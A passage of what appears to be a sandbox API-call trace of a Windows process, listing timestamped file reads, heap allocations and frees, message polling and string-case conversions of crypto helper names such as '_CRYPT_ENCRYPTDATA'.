nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0192.548] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x227e, lpOverlapped=0x0) returned 1 [0192.549] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0192.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0192.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0192.549] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0192.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0192.549] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1227e) returned 0xbea018 [0192.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0192.550] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0192.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0192.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0192.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0192.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0192.551] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1227e) returned 0xbfc2a0 [0192.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0192.551] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0192.551] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0192.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0192.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0192.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0192.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0192.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1227e) returned 0xbea018 [0192.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0192.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0192.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0192.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0192.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0192.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0192.552] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0192.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0192.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0192.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0192.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0192.552] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0192.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0192.552] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0192.552] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0192.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0192.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0192.553] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0192.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0192.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0192.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2758 [0192.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0192.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0192.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0192.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0192.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1227e) returned 0xbea018 [0192.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0192.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0192.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0192.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0192.553] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0192.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2778 [0192.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0192.553] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0192.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0192.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0192.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0192.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0192.554] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0192.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd438 [0192.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0192.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0192.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0192.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0192.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0192.554] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1227e) returned 0xa5f008 [0192.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0192.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0192.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0192.556] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0192.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0192.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0192.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0192.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0192.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0192.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0192.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0192.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0192.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0192.556] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0192.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0192.557] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0192.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0192.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0192.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0192.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0192.557] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0192.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0192.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0192.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0192.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0192.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0192.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0192.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0192.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0192.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0192.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0192.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0192.557] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0192.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0192.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0192.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0192.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26f8 [0192.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0192.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0192.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0192.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0192.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdaf8 [0192.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0192.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0192.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0192.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0192.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0192.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0192.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0192.558] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0192.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0192.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0192.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0192.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0192.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0192.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0192.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0192.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0192.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0192.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0192.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0192.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0192.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0192.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0192.559] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0192.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0192.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0192.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0192.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0192.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0192.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0192.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0192.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0192.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0192.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0192.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0192.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0192.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0192.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0192.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0192.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0192.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0192.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0192.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0192.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0192.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0192.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0192.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0192.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0192.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.560] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0192.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0192.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0192.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0192.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0192.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0192.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0192.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0192.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0192.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0192.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0192.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0192.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0192.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0192.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0192.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0192.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0192.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0192.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0192.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0192.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0192.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0192.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0192.561] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0192.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0192.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0192.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0192.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0192.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0192.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0192.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0192.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0192.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0192.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0192.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0192.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0192.562] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0192.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0192.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0192.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd780 [0192.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0192.562] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0192.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0192.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0192.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0192.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0192.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0192.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0192.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0192.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0192.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0192.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0192.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0192.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0192.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0192.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0192.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0192.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0192.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0192.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0192.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0192.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0192.563] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0192.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0192.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) 